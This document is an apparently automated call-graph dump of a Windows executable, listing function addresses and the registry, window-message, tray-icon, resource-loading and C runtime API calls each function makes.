db2365 __fread_nolock 103755->103765 103756 da8ec0 52 API calls 103756->103765 103757 df74e3 103767 e013c8 8 API calls __fread_nolock 103757->103767 103759 df74ef 103763 dabed9 8 API calls 103759->103763 103764 db1ff7 __fread_nolock 103759->103764 103760 db23b6 103762 da7d74 8 API calls 103760->103762 103761 dc014b 8 API calls 103761->103765 103762->103764 103763->103764 103765->103756 103765->103757 103765->103760 103765->103761 103765->103764 103766 dc017b 8 API calls 103765->103766 103766->103765 103767->103759 103768 dadd3d 103769 dadd63 103768->103769 103770 df19c2 103768->103770 103773 dc014b 8 API calls 103769->103773 103791 dadead 103769->103791 103771 df1a46 103770->103771 103772 df1a82 103770->103772 103776 df1a26 103770->103776 103790 df1a7d 103771->103790 103827 e13fe1 81 API calls __wsopen_s 103771->103827 103828 e13fe1 81 API calls __wsopen_s 103772->103828 103779 dadd8d 103773->103779 103826 dbe6e8 207 API calls 103776->103826 103777 dc017b 8 API calls 103785 dadee4 __fread_nolock 103777->103785 103780 dc014b 8 API calls 103779->103780 103779->103785 103782 dadddb 103780->103782 103781 dc017b 8 API calls 103781->103785 103782->103776 103783 dade16 103782->103783 103784 db0340 207 API calls 103783->103784 103786 dade29 103784->103786 103785->103771 103785->103781 103786->103785 103787 df1aa5 103786->103787 103788 dade77 103786->103788 103786->103790 103792 dad526 103786->103792 103829 e13fe1 81 API calls __wsopen_s 103787->103829 103788->103791 103788->103792 103791->103777 103793 dc014b 8 API calls 103792->103793 103794 dad589 103793->103794 103810 dac32d 103794->103810 103797 dc014b 8 API calls 103803 dad66e messages 103797->103803 103799 dabed9 8 API calls 103799->103803 103800 dab4c8 8 API calls 103800->103803 103802 df1f79 103830 e056ae 8 API calls messages 103802->103830 103803->103799 103803->103800 103803->103802 103804 df1f94 103803->103804 103806 dac3ab 8 API calls 103803->103806 103807 dad911 messages 103803->103807 103806->103803 103808 dad9ac messages 103807->103808 103817 dac3ab 103807->103817 103809 dad9c3 103808->103809 103825 dbe30a 8 API calls messages 103808->103825 103814 dac33d 103810->103814 103811 dac345 103811->103797 103812 dc014b 8 API calls 103812->103814 103813 dabf73 8 API calls 103813->103814 103814->103811 103814->103812 103814->103813 103815 dabed9 8 API calls 103814->103815 103816 dac32d 8 API calls 103814->103816 103815->103814 103816->103814 103818 dac3b9 103817->103818 103824 dac3e1 messages 103817->103824 103819 dac3c7 103818->103819 103820 dac3ab 8 API calls 103818->103820 103821 dac3cd 103819->103821 103822 dac3ab 8 API calls 103819->103822 103820->103819 103821->103824 103831 dac7e0 8 API calls messages 103821->103831 103822->103821 103824->103808 103825->103808 103826->103771 103827->103790 103828->103790 103829->103790 103830->103804 103831->103824 103832 da1033 103837 da68b4 103832->103837 103836 da1042 103838 dabf73 8 API calls 103837->103838 103839 da6922 103838->103839 103845 da589f 103839->103845 103841 da69bf 103843 da1038 103841->103843 103848 da6b14 8 API calls __fread_nolock 103841->103848 103844 dc0413 29 API calls __onexit 103843->103844 103844->103836 103849 da58cb 103845->103849 103848->103841 103850 da58be 103849->103850 103851 da58d8 103849->103851 103850->103841 103851->103850 103852 da58df RegOpenKeyExW 103851->103852 103852->103850 103853 da58f9 RegQueryValueExW 103852->103853 103854 da591a 103853->103854 103855 da592f RegCloseKey 103853->103855 103854->103855 103855->103850 103856 df6555 103857 dc014b 8 API calls 103856->103857 103858 df655c 103857->103858 103860 dc017b 8 API calls 103858->103860 103862 df6575 __fread_nolock 103858->103862 103859 dc017b 8 API calls 103861 df659a 103859->103861 103860->103862 103862->103859 103863 da36f5 103866 da370f 103863->103866 103867 da3726 103866->103867 103868 da378a 103867->103868 103869 da372b 103867->103869 103905 da3788 103867->103905 103871 de3df4 103868->103871 103872 da3790 103868->103872 103873 da3738 103869->103873 103874 da3804 PostQuitMessage 103869->103874 103870 da376f DefWindowProcW 103908 da3709 103870->103908 103921 da2f92 10 API calls 103871->103921 103875 da37bc SetTimer RegisterWindowMessageW 103872->103875 103876 da3797 103872->103876 103877 da3743 103873->103877 103878 de3e61 103873->103878 103874->103908 103882 da37e5 CreatePopupMenu 103875->103882 103875->103908 103880 da37a0 KillTimer 103876->103880 103881 de3d95 103876->103881 103883 da380e 103877->103883 103884 da374d 103877->103884 103924 e0c8f7 65 API calls ___scrt_fastfail 103878->103924 103890 da3907 Shell_NotifyIconW 103880->103890 103888 de3d9a 103881->103888 103889 de3dd0 MoveWindow 103881->103889 103882->103908 103911 dbfcad 103883->103911 103891 da3758 103884->103891 103892 de3e46 103884->103892 103886 de3e15 103922 dbf23c 40 API calls 103886->103922 103896 de3dbf SetFocus 103888->103896 103897 de3da0 103888->103897 103889->103908 103898 da37b3 103890->103898 103895 da3763 103891->103895 103899 da37f2 103891->103899 103892->103870 103923 e01423 8 API calls 103892->103923 103893 de3e73 103893->103870 103893->103908 103895->103870 103907 da3907 Shell_NotifyIconW 103895->103907 103896->103908 103897->103895 103900 de3da9 103897->103900 103918 da59ff DeleteObject DestroyWindow 103898->103918 103919 da381f 75 API calls ___scrt_fastfail 103899->103919 103920 da2f92 10 API calls 103900->103920 103905->103870 103906 da3802 103906->103908 103909 de3e3a 103907->103909 103910 da396b 60 API calls 103909->103910 103910->103905 103912 dbfd4b 103911->103912 103913 dbfcc5 ___scrt_fastfail 103911->103913 103912->103908 103914 da61a9 55 API calls 103913->103914 103916 dbfcec 103914->103916 103915 dbfd34 KillTimer SetTimer 103915->103912 103916->103915 103917 dffe2b Shell_NotifyIconW 103916->103917 103917->103915 103918->103908 103919->103906 103920->103908 103921->103886 103922->103895 103923->103905 103924->103893 103925 df5650 103934 dbe3d5 103925->103934 103927 df5666 103929 df56e1 103927->103929 103943 dbaa65 9 API calls 103927->103943 103931 df61d7 103929->103931 103945 e13fe1 81 API calls __wsopen_s 103929->103945 103932 df56c1 103932->103929 103944 e1247e 8 API calls 103932->103944 103935 dbe3e3 103934->103935 103936 dbe3f6 103934->103936 103937 dab4c8 8 API calls 103935->103937 103938 dbe3fb 103936->103938 103939 dbe429 103936->103939 103942 dbe3ed 103937->103942 103940 dc014b 8 API calls 103938->103940 103941 dab4c8 8 API calls 103939->103941 103940->103942 103941->103942 103942->103927 103943->103932 103944->103929 103945->103931 103946 df400f 103961 daeeb0 messages 103946->103961 103947 daf211 PeekMessageW 103947->103961 103948 daef07 GetInputState 103948->103947 103948->103961 103949 daf0d5 103951 df32cd TranslateAcceleratorW 103951->103961 103952 daf28f PeekMessageW 103952->103961 103953 daf273 TranslateMessage DispatchMessageW 103953->103952 103954 daf104 timeGetTime 103954->103961 103955 daf2af Sleep 103972 daf2c0 103955->103972 103956 df4183 Sleep 103956->103972 103957 dbf215 timeGetTime 103957->103972 103958 df33e9 timeGetTime 104013 dbaa65 9 API calls 103958->104013 103960 e0dd87 46 API calls 103960->103972 103961->103947 103961->103948 103961->103949 103961->103951 103961->103952 103961->103953 103961->103954 103961->103955 103961->103956 103961->103958 103975 db0340 207 API calls 103961->103975 103976 db2b20 207 API calls 103961->103976 103978 daf450 103961->103978 103985 daf6d0 103961->103985 104008 dbe915 103961->104008 104014 e1446f 8 API calls 103961->104014 104015 e13fe1 81 API calls __wsopen_s 103961->104015 103962 df421a GetExitCodeProcess 103963 df4246 CloseHandle 103962->103963 103964 df4230 WaitForSingleObject 103962->103964 103963->103972 103964->103961 103964->103963 103965 e3345b GetForegroundWindow 103965->103972 103967 df3d51 103968 df3d59 103967->103968 103969 df42b8 Sleep 103969->103961 103972->103957 103972->103960 103972->103961 103972->103962 103972->103965 103972->103967 103972->103969 104016 e260b5 8 API calls 103972->104016 104017 e0f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103972->104017 103975->103961 103976->103961 103979 daf46f 103978->103979 103980 daf483 103978->103980 104018 dae960 103979->104018 104050 e13fe1 81 API calls __wsopen_s 103980->104050 103983 daf47a 103983->103961 103984 df4584 103984->103984 103986 daf6ef 103985->103986 104003 daf7dc messages 103986->104003 104067 dc05b2 5 API calls __Init_thread_wait 103986->104067 103989 df45d9 103991 dabf73 8 API calls 103989->103991 103989->104003 103990 dabf73 8 API calls 103990->104003 103993 df45f3 103991->103993 103992 e13fe1 81 API calls 103992->104003 104068 dc0413 29 API calls __onexit 103993->104068 103994 dabe2d 39 API calls 103994->104003 103997 df45fd 104069 dc0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103997->104069 104001 db0340 207 API calls 104001->104003 104002 dabed9 8 API calls 104002->104003 104003->103990 104003->103992 104003->103994 104003->104001 104003->104002 104004 dafae1 104003->104004 104005 db1ca0 8 API calls 104003->104005 104066 dbb35c 207 API calls 104003->104066 104070 dc05b2 5 API calls __Init_thread_wait 104003->104070 104071 dc0413 29 API calls __onexit 104003->104071 104072 dc0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104003->104072 104073 e25231 101 API calls 104003->104073 104074 e2731e 207 API calls 104003->104074 104004->103961 104005->104003 104009 dbe959 104008->104009 104010 dbe928 104008->104010 104009->103961 104010->104009 104011 dbe94c IsDialogMessageW 104010->104011 104012 dfeff6 GetClassLongW 104010->104012 104011->104009 104011->104010 104012->104010 104012->104011 104013->103961 104014->103961 104015->103961 104016->103972 104017->103972 104019 db0340 207 API calls 104018->104019 104021 dae99d 104019->104021 104020 daea0b messages 104020->103983 104021->104020 104023 daedd5 104021->104023 104024 daeac3 104021->104024 104030 daebb8 104021->104030 104035 df31d3 104021->104035 104039 dc014b 8 API calls 104021->104039 104045 daeb29 __fread_nolock messages 104021->104045 104023->104020 104033 dc017b 8 API calls 104023->104033 104024->104023 104026 daeace 104024->104026 104025 daecff 104028 df31c4 104025->104028 104029 daed14 104025->104029 104027 dc014b 8 API calls 104026->104027 104038 daead5 __fread_nolock 104027->104038 104063 e26162 8 API calls 104028->104063 104032 dc014b 8 API calls 104029->104032 104034 dc017b 8 API calls 104030->104034 104042 daeb6a 104032->104042 104033->104038 104034->104045 104064 e13fe1 81 API calls __wsopen_s 104035->104064 104036 dc014b 8 API calls 104037 daeaf6 104036->104037 104037->104045 104051 dad260 104037->104051 104038->104036 104038->104037 104039->104021 104041 df31b3 104062 e13fe1 81 API calls __wsopen_s 104041->104062 104042->103983 104045->104025 104045->104041 104045->104042 104046 df318e 104045->104046 104048 df316c 104045->104048 104059 da44fe 207 API calls 104045->104059 104061 e13fe1 81 API calls __wsopen_s 104046->104061 104060 e13fe1 81 API calls __wsopen_s 104048->104060 104050->103984 104052 dad29a 104051->104052 104053 dad2c6 104051->104053 104054 daf6d0 207 API calls 104052->104054 104057 dad2a0 104052->104057 104055 db0340 207 API calls 104053->104055 104054->104057 104056 df184b 104055->104056 104056->104057 104065 e13fe1 81 API calls __wsopen_s 104056->104065 104057->104045 104059->104045 104060->104042 104061->104042 104062->104042 104063->104035 104064->104020 104065->104057 104066->104003 104067->103989 104068->103997 104069->104003 104070->104003 104071->104003 104072->104003 104073->104003 104074->104003 104075 dcf06e 104076 dcf07a CallCatchBlock 104075->104076 104077 dcf09b 104076->104077 104078 dcf086 104076->104078 104088 dc94fd EnterCriticalSection 104077->104088 104094 dcf649 20 API calls __dosmaperr 104078->104094 104081 dcf08b 104095 dd2b5c 26 API calls __wsopen_s 104081->104095 104082 dcf0a7 104089 dcf0db 104082->104089 104087 dcf096 __wsopen_s 104088->104082 104097 dcf106 104089->104097 104091 dcf0e8 104092 dcf0b4 104091->104092 104117 dcf649 20 API calls __dosmaperr 104091->104117 104096 dcf0d1 LeaveCriticalSection __fread_nolock 104092->104096 104094->104081 104095->104087 104096->104087 104098 dcf12e 104097->104098 104099 dcf114 104097->104099 104100 dcdcc5 __fread_nolock 26 API calls 104098->104100 104121 dcf649 20 API calls __dosmaperr 104099->104121 104102 dcf137 104100->104102 104118 dd9789 104102->104118 104103 dcf119 104122 dd2b5c 26 API calls __wsopen_s 104103->104122 104107 dcf1bf 104111 dcf1dc 104107->104111 104113 dcf1ee 104107->104113 104108 dcf23b 104109 dcf248 104108->104109 104108->104113 104124 dcf649 20 API calls __dosmaperr 104109->104124 104123 dcf41f 31 API calls 4 library calls 104111->104123 104114 dcf124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 104113->104114 104125 dcf29b 30 API calls 2 library calls 104113->104125 104114->104091 104115 dcf1e6 104115->104114 104117->104092 104126 dd9606 104118->104126 104120 dcf153 104120->104107 104120->104108 104120->104114 104121->104103 104122->104114 104123->104115 104124->104114 104125->104114 104127 dd9612 CallCatchBlock 104126->104127 104128 dd961a 104127->104128 104129 dd9632 104127->104129 104152 dcf636 20 API calls __dosmaperr 104128->104152 104131 dd96e6 104129->104131 104135 dd966a 104129->104135 104157 dcf636 20 API calls __dosmaperr 104131->104157 104132 dd961f 104153 dcf649 20 API calls __dosmaperr 104132->104153 104151 dd54ba EnterCriticalSection 104135->104151 104136 dd96eb 104158 dcf649 20 API calls __dosmaperr 104136->104158 104139 dd9670 104141 dd96a9 104139->104141 104142 dd9694 104139->104142 104140 dd96f3 104159 dd2b5c 26 API calls __wsopen_s 104140->104159 104144 dd970b __wsopen_s 28 API calls 104141->104144 104154 dcf649 20 API calls __dosmaperr 104142->104154 104148 dd96a4 104144->104148 104146 dd9699 104155 dcf636 20 API calls __dosmaperr 104146->104155 104147 dd9627 __wsopen_s 104147->104120 104156 dd96de LeaveCriticalSection __wsopen_s 104148->104156 104151->104139 104152->104132 104153->104147 104154->104146 104155->104148 104156->104147 104157->104136 104158->104140 104159->104147 104160 dc076b 104161 dc0777 CallCatchBlock 104160->104161 104190 dc0221 104161->104190 104163 dc077e 104164 dc08d1 104163->104164 104167 dc07a8 104163->104167 104228 dc0baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 104164->104228 104166 dc08d8 104229 dc51c2 28 API calls _abort 104166->104229 104177 dc07e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 104167->104177 104201 dd27ed 104167->104201 104169 dc08de 104230 dc5174 28 API calls _abort 104169->104230 104173 dc08e6 104174 dc07c7 104181 dc0848 104177->104181 104224 dc518a 38 API calls 3 library calls 104177->104224 104178 dc084e 104213 da331b 104178->104213 104209 dc0cc9 104181->104209 104184 dc086a 104184->104166 104185 dc086e 104184->104185 104186 dc0877 104185->104186 104226 dc5165 28 API calls _abort 104185->104226 104227 dc03b0 13 API calls 2 library calls 104186->104227 104189 dc087f 104189->104174 104191 dc022a 104190->104191 104231 dc0a08 IsProcessorFeaturePresent 104191->104231 104193 dc0236 104232 dc3004 10 API calls 3 library calls 104193->104232 104195 dc023b 104200 dc023f 104195->104200 104233 dd2687 104195->104233 104198 dc0256 104198->104163 104200->104163 104202 dd2804 104201->104202 104203 dc0dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 104202->104203 104204 dc07c1 104203->104204 104204->104174 104205 dd2791 104204->104205 104207 dd27c0 104205->104207 104206 dc0dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 104208 dd27e9 104206->104208 104207->104206 104208->104177 104301 dc26b0 104209->104301 104212 dc0cef 104212->104178 104214 da3327 IsThemeActive 104213->104214 104216 da3382 104213->104216 104303 dc52b3 104214->104303 104225 dc0d02 GetModuleHandleW 104216->104225 104217 da3352 104309 dc5319 104217->104309 104219 da3359 104316 da32e6 SystemParametersInfoW SystemParametersInfoW 104219->104316 104221 da3360 104317 da338b 104221->104317 104223 da3368 SystemParametersInfoW 104223->104216 104224->104181 104225->104184 104226->104186 104227->104189 104228->104166 104229->104169 104230->104173 104231->104193 104232->104195 104237 ddd576 104233->104237 104236 dc302d 8 API calls 3 library calls 104236->104200 104240 ddd593 104237->104240 104241 ddd58f 104237->104241 104239 dc0248 104239->104198 104239->104236 104240->104241 104243 dd4f6e 104240->104243 104255 dc0dfc 104241->104255 104244 dd4f7a CallCatchBlock 104243->104244 104262 dd32d1 EnterCriticalSection 104244->104262 104246 dd4f81 104263 dd5422 104246->104263 104248 dd4f90 104249 dd4f9f 104248->104249 104276 dd4e02 29 API calls 104248->104276 104278 dd4fbb LeaveCriticalSection _abort 104249->104278 104252 dd4f9a 104277 dd4eb8 GetStdHandle GetFileType 104252->104277 104253 dd4fb0 __wsopen_s 104253->104240 104256 dc0e05 104255->104256 104257 dc0e07 IsProcessorFeaturePresent 104255->104257 104256->104239 104259 dc0fce 104257->104259 104300 dc0f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 104259->104300 104261 dc10b1 104261->104239 104262->104246 104264 dd542e CallCatchBlock 104263->104264 104265 dd543b 104264->104265 104266 dd5452 104264->104266 104287 dcf649 20 API calls __dosmaperr 104265->104287 104279 dd32d1 EnterCriticalSection 104266->104279 104269 dd5440 104288 dd2b5c 26 API calls __wsopen_s 104269->104288 104272 dd545e 104275 dd548a 104272->104275 104280 dd5373 104272->104280 104273 dd544a __wsopen_s 104273->104248 104289 dd54b1 LeaveCriticalSection _abort 104275->104289 104276->104252 104277->104249 104278->104253 104279->104272 104290 dd4ff0 104280->104290 104282 dd5392 104284 dd2d38 _free 20 API calls 104282->104284 104283 dd5385 104283->104282 104297 dd3778 11 API calls 2 library calls 104283->104297 104286 dd53e4 104284->104286 104286->104272 104287->104269 104288->104273 104289->104273 104295 dd4ffd __dosmaperr 104290->104295 104291 dd503d 104299 dcf649 20 API calls __dosmaperr 104291->104299 104292 dd5028 RtlAllocateHeap 104293 dd503b 104292->104293 104292->104295 104293->104283 104295->104291 104295->104292 104298 dc521d 7 API calls 2 library calls 104295->104298 104297->104283 104298->104295 104299->104293 104300->104261 104302 dc0cdc GetStartupInfoW 104301->104302 104302->104212 104304 dc52bf CallCatchBlock 104303->104304 104366 dd32d1 EnterCriticalSection 104304->104366 104306 dc52ca pre_c_initialization 104367 dc530a 104306->104367 104308 dc52ff __wsopen_s 104308->104217 104310 dc533f 104309->104310 104311 dc5325 104309->104311 104310->104219 104311->104310 104371 dcf649 20 API calls __dosmaperr 104311->104371 104313 dc532f 104372 dd2b5c 26 API calls __wsopen_s 104313->104372 104315 dc533a 104315->104219 104316->104221 104318 da339b __wsopen_s 104317->104318 104319 dabf73 8 API calls 104318->104319 104320 da33a7 GetCurrentDirectoryW 104319->104320 104373 da4fd9 104320->104373 104322 da33ce IsDebuggerPresent 104323 da33dc 104322->104323 104324 de3ca3 MessageBoxA 104322->104324 104325 de3cbb 104323->104325 104326 da33f0 104323->104326 104324->104325 104477 da4176 8 API calls 104325->104477 104441 da3a95 104326->104441 104333 da3462 104335 de3cec SetCurrentDirectoryW 104333->104335 104336 da346a 104333->104336 104335->104336 104337 da3475 104336->104337 104478 e01fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 104336->104478 104473 da34d3 7 API calls 104337->104473 104340 de3d07 104340->104337 104344 de3d19 104340->104344 104343 da347f 104347 da396b 60 API calls 104343->104347 104350 da3494 104343->104350 104345 da5594 10 API calls 104344->104345 104346 de3d22 104345->104346 104348 dab329 8 API calls 104346->104348 104347->104350 104349 de3d30 104348->104349 104352 de3d5f 104349->104352 104353 de3d38 104349->104353 104351 da34af 104350->104351 104354 da3907 Shell_NotifyIconW 104350->104354 104357 da34b6 SetCurrentDirectoryW 104351->104357 104356 da6b7c 8 API calls 104352->104356 104355 da6b7c 8 API calls 104353->104355 104354->104351 104358 de3d43 104355->104358 104359 de3d5b GetForegroundWindow ShellExecuteW 104356->104359 104360 da34ca 104357->104360 104361 da7bb5 8 API calls 104358->104361 104364 de3d90 104359->104364 104360->104223 104363 de3d51 104361->104363 104365 da6b7c 8 API calls 104363->104365 104364->104351 104365->104359 104366->104306 104370 dd3319 LeaveCriticalSection 104367->104370 104369 dc5311 104369->104308 104370->104369 104371->104313 104372->104315 104374 dabf73 8 API calls 104373->104374 104375 da4fef 104374->104375 104479 da63d7 104375->104479 104377 da500d 104378 dabd57 8 API calls 104377->104378 104379 da5021 104378->104379 104380 dabed9 8 API calls 104379->104380 104381 da502c 104380->104381 104493 da893c 104381->104493 104384 dab329 8 API calls 104385 da5045 104384->104385 104386 dabe2d 39 API calls 104385->104386 104387 da5055 104386->104387 104388 dab329 8 API calls 104387->104388 104389 da507b 104388->104389 104390 dabe2d 39 API calls 104389->104390 104391 da508a 104390->104391 104392 dabf73 8 API calls 104391->104392 104393 da50a8 104392->104393 104496 da51ca 104393->104496 104396 dc4d98 _strftime 40 API calls 104397 da50c2 104396->104397 104398 da50cc 104397->104398 104399 de4b23 104397->104399 104400 dc4d98 _strftime 40 API calls 104398->104400 104401 da51ca 8 API calls 104399->104401 104402 da50d7 104400->104402 104403 de4b37 104401->104403 104402->104403 104404 da50e1 104402->104404 104405 da51ca 8 API calls 104403->104405 104406 dc4d98 _strftime 40 API calls 104404->104406 104407 de4b53 104405->104407 104408 da50ec 104406->104408 104410 da5594 10 API calls 104407->104410 104408->104407 104409 da50f6 104408->104409 104411 dc4d98 _strftime 40 API calls 104409->104411 104412 de4b76 104410->104412 104413 da5101 104411->104413 104414 da51ca 8 API calls 104412->104414 104415 da510b 104413->104415 104416 de4b9f 104413->104416 104418 de4b82 104414->104418 104419 da512e 104415->104419 104420 dabed9 8 API calls 104415->104420 104417 da51ca 8 API calls 104416->104417 104421 de4bbd 104417->104421 104423 dabed9 8 API calls 104418->104423 104422 de4bda 104419->104422 104426 da7e12 8 API calls 104419->104426 104424 da5121 104420->104424 104425 dabed9 8 API calls 104421->104425 104427 de4b90 104423->104427 104428 da51ca 8 API calls 104424->104428 104429 de4bcb 104425->104429 104430 da513e 104426->104430 104431 da51ca 8 API calls 104427->104431 104428->104419 104432 da51ca 8 API calls 104429->104432 104433 da8470 8 API calls 104430->104433 104431->104416 104432->104422 104434 da514c 104433->104434 104502 da8a60 104434->104502 104436 da893c 8 API calls 104438 da5167 104436->104438 104437 da8a60 8 API calls 104437->104438 104438->104436 104438->104437 104439 da51ab 104438->104439 104440 da51ca 8 API calls 104438->104440 104439->104322 104440->104438 104442 da3aa2 __wsopen_s 104441->104442 104443 da3abb 104442->104443 104444 de40da ___scrt_fastfail 104442->104444 104445 da5851 9 API calls 104443->104445 104446 de40f6 GetOpenFileNameW 104444->104446 104447 da3ac4 104445->104447 104448 de4145 104446->104448 104514 da3a57 104447->104514 104450 da8577 8 API calls 104448->104450 104452 de415a 104450->104452 104452->104452 104454 da3ad9 104532 da62d5 104454->104532 105077 da3624 7 API calls 104473->105077 104475 da347a 104476 da35b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104475->104476 104476->104343 104477->104333 104478->104340 104480 da63e4 __wsopen_s 104479->104480 104481 da8577 8 API calls 104480->104481 104482 da6416 104480->104482 104481->104482 104483 da655e 8 API calls 104482->104483 104492 da644c 104482->104492 104483->104482 104484 da655e 8 API calls 104484->104492 104485 da651a 104486 dab329 8 API calls 104485->104486 104487 da654f 104485->104487 104488 da6543 104486->104488 104487->104377 104490 da6a7c 8 API calls 104488->104490 104489 dab329 8 API calls 104489->104492 104490->104487 104491 da6a7c 8 API calls 104491->104492 104492->104484 104492->104485 104492->104489 104492->104491 104494 dc014b 8 API calls 104493->104494 104495 da5038 104494->104495 104495->104384 104497 da51f2 104496->104497 104498 da51d4 104496->104498 104500 da8577 8 API calls 104497->104500 104499 da50b4 104498->104499 104501 dabed9 8 API calls 104498->104501 104499->104396 104500->104499 104501->104499 104503 da8a76 104502->104503 104504 de6737 104503->104504 104510 da8a80 104503->104510 104513 dbb7a2 8 API calls 104504->104513 104505 de6744 104507 dab4c8 8 API calls 104505->104507 104508 de6762 104507->104508 104508->104508 104509 da8b94 104511 dc014b 8 API calls 104509->104511 104510->104505 104510->104509 104512 da8b9b 104510->104512 104511->104512 104512->104438 104513->104505 104515 de22d0 __wsopen_s 104514->104515 104516 da3a64 GetLongPathNameW 104515->104516 104517 da8577 8 API calls 104516->104517 104518 da3a8c 104517->104518 104519 da53f2 104518->104519 104520 dabf73 8 API calls 104519->104520 104521 da5404 104520->104521 104522 da5851 9 API calls 104521->104522 104523 da540f 104522->104523 104524 da541a 104523->104524 104525 de4d5b 104523->104525 104526 da6a7c 8 API calls 104524->104526 104530 de4d7d 104525->104530 104568 dbe36b 41 API calls 104525->104568 104528 da5426 104526->104528 104562 da1340 104528->104562 104531 da5439 104531->104454 104569 da6679 104532->104569 104535 de5336 104694 e136b8 104535->104694 104537 da6679 93 API calls 104539 da630e 104537->104539 104539->104535 104542 da6316 104539->104542 104545 da6322 104542->104545 104546 de5353 104542->104546 104591 da3b39 104545->104591 104745 e0e30e 82 API calls 104546->104745 104549 de5361 104563 da1352 104562->104563 104567 da1371 __fread_nolock 104562->104567 104565 dc017b 8 API calls 104563->104565 104564 dc014b 8 API calls 104566 da1388 104564->104566 104565->104567 104566->104531 104567->104564 104568->104525 104748 da663e LoadLibraryA 104569->104748 104574 de5648 104577 da66e7 68 API calls 104574->104577 104575 da66a4 LoadLibraryExW 104756 da6607 LoadLibraryA 104575->104756 104579 de564f 104577->104579 104581 da6607 3 API calls 104579->104581 104583 de5657 104581->104583 104582 da66ce 104582->104583 104584 da66da 104582->104584 104777 da684a 104583->104777 104586 da66e7 68 API calls 104584->104586 104588 da62fa 104586->104588 104588->104535 104588->104537 104592 de415f 104591->104592 104593 da3b62 104591->104593 104594 dc017b 8 API calls 104593->104594 104695 e136d4 104694->104695 104696 da6874 64 API calls 104695->104696 104697 e136e8 104696->104697 104975 e13827 104697->104975 104745->104549 104749 da6656 GetProcAddress 104748->104749 104750 da6674 104748->104750 104751 da6666 104749->104751 104753 dce95b 104750->104753 104751->104750 104752 da666d FreeLibrary 104751->104752 104752->104750 104785 dce89a 104753->104785 104755 da6698 104755->104574 104755->104575 104757 da663b 104756->104757 104758 da661c GetProcAddress 104756->104758 104761 da6720 104757->104761 104759 da662c 104758->104759 104759->104757 104760 da6634 FreeLibrary 104759->104760 104760->104757 104762 dc017b 8 API calls 104761->104762 104763 da6735 104762->104763 104764 da423c 8 API calls 104763->104764 104765 da6741 __fread_nolock 104764->104765 104766 de56c2 104765->104766 104770 da677c 104765->104770 104842 e13a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 104765->104842 104843 e13a92 74 API calls 104766->104843 104769 da684a 40 API calls 104769->104770 104770->104769 104772 da6810 messages 104770->104772 104773 de5706 104770->104773 104774 da6874 64 API calls 104770->104774 104772->104582 104837 da6874 104773->104837 104774->104770 104778 da685c 104777->104778 104781 de5760 104777->104781 104875 dcec34 104778->104875 104782 e132bd 104912 e1310d 104782->104912 104788 dce8a6 CallCatchBlock 104785->104788 104786 dce8b4 104810 dcf649 20 API calls __dosmaperr 104786->104810 104788->104786 104790 dce8e4 104788->104790 104789 dce8b9 104811 dd2b5c 26 API calls __wsopen_s 104789->104811 104792 dce8e9 104790->104792 104793 dce8f6 104790->104793 104812 dcf649 20 API calls __dosmaperr 104792->104812 104802 dd83e1 104793->104802 104796 dce8ff 104798 dce905 104796->104798 104799 dce912 104796->104799 104797 dce8c4 __wsopen_s 104797->104755 104813 dcf649 20 API calls __dosmaperr 104798->104813 104814 dce944 LeaveCriticalSection __fread_nolock 104799->104814 104803 dd83ed CallCatchBlock 104802->104803 104815 dd32d1 EnterCriticalSection 104803->104815 104805 dd83fb 104816 dd847b 104805->104816 104809 dd842c __wsopen_s 104809->104796 104810->104789 104811->104797 104812->104797 104813->104797 104814->104797 104815->104805 104823 dd849e 104816->104823 104817 dd84f7 104818 dd4ff0 __dosmaperr 20 API calls 104817->104818 104819 dd8500 104818->104819 104821 dd2d38 _free 20 API calls 104819->104821 104822 dd8509 104821->104822 104828 dd8408 104822->104828 104834 dd3778 11 API calls 2 library calls 104822->104834 104823->104817 104823->104823 104823->104828 104832 dc94fd EnterCriticalSection 104823->104832 104833 dc9511 LeaveCriticalSection 104823->104833 104825 dd8528 104835 dc94fd EnterCriticalSection 104825->104835 104829 dd8437 104828->104829 104836 dd3319 LeaveCriticalSection 104829->104836 104831 dd843e 104831->104809 104832->104823 104833->104823 104834->104825 104835->104828 104836->104831 104838 da6883 104837->104838 104841 de5780 104837->104841 104844 dcf053 104838->104844 104842->104766 104843->104770 104847 dcee1a 104844->104847 104848 dcee26 CallCatchBlock 104847->104848 104849 dcee32 104848->104849 104850 dcee58 104848->104850 104872 dcf649 20 API calls __dosmaperr 104849->104872 104860 dc94fd EnterCriticalSection 104850->104860 104852 dcee37 104873 dd2b5c 26 API calls __wsopen_s 104852->104873 104855 dcee64 104861 dcef7a 104855->104861 104859 dcee42 __wsopen_s 104860->104855 104862 dcef9c 104861->104862 104863 dcef8c 104861->104863 104872->104852 104873->104859 104878 dcec51 104875->104878 104877 da686d 104877->104782 104879 dcec5d CallCatchBlock 104878->104879 104880 dcec9d 104879->104880 104881 dcec70 ___scrt_fastfail 104879->104881 104882 dcec95 __wsopen_s 104879->104882 104891 dc94fd EnterCriticalSection 104880->104891 104905 dcf649 20 API calls __dosmaperr 104881->104905 104882->104877 104884 dceca7 104892 dcea68 104884->104892 104887 dcec8a 104906 dd2b5c 26 API calls __wsopen_s 104887->104906 104891->104884 104893 dcea7a ___scrt_fastfail 104892->104893 104898 dcea97 104892->104898 104894 dcea87 104893->104894 104893->104898 104903 dceada __fread_nolock 104893->104903 104908 dcf649 20 API calls __dosmaperr 104894->104908 104896 dcea8c 104909 dd2b5c 26 API calls __wsopen_s 104896->104909 104907 dcecdc LeaveCriticalSection __fread_nolock 104898->104907 104899 dcebf6 ___scrt_fastfail 104911 dcf649 20 API calls __dosmaperr 104899->104911 104902 dcdcc5 __fread_nolock 26 API calls 104902->104903 104903->104898 104903->104899 